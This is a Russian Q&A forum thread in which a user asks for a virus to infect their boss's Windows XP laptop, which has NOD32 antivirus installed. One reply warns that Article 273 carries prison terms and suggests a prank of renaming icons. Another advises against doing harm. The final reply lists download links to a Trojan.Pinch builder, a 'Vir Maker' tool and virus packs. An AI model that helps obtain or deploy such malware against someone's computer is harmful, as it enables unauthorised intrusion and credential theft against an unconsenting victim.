Нужен вирус в подарок начальнику!! ! У него букс Toshiba, стоит хрюша с пропиской и сёдня зараза поставил четвёртый Нод.
Ответ(ы) на вопрос:
попробуйте сами сделать [ссылка заблокирована по решению администрации проекта] /////////////////////// кста я хоть этим и сам увлёкся но ЭТО 273 СТОТЬЯ ДО 3 ЛЕТ а если информация уничтожится то до 7 лет... а чё надо чтоб вирус делал?? ?моно чтоб не портил а просто постебать типо все значки исчезнут или переиминуются на "[начальник] лохукаидр"
делая гадость другому смотри как бы обратно не вернулась
Trojan.Pinch Builder - street-groove.clan.su/load/11-1-0-40 Vir Maker - street-groove.clan.su/load/11-1-0-166 вирусы 16 - street-groove.clan.su/load/11-1-0-162 вирусы 9 - street-groove.clan.su/load/11-1-0-177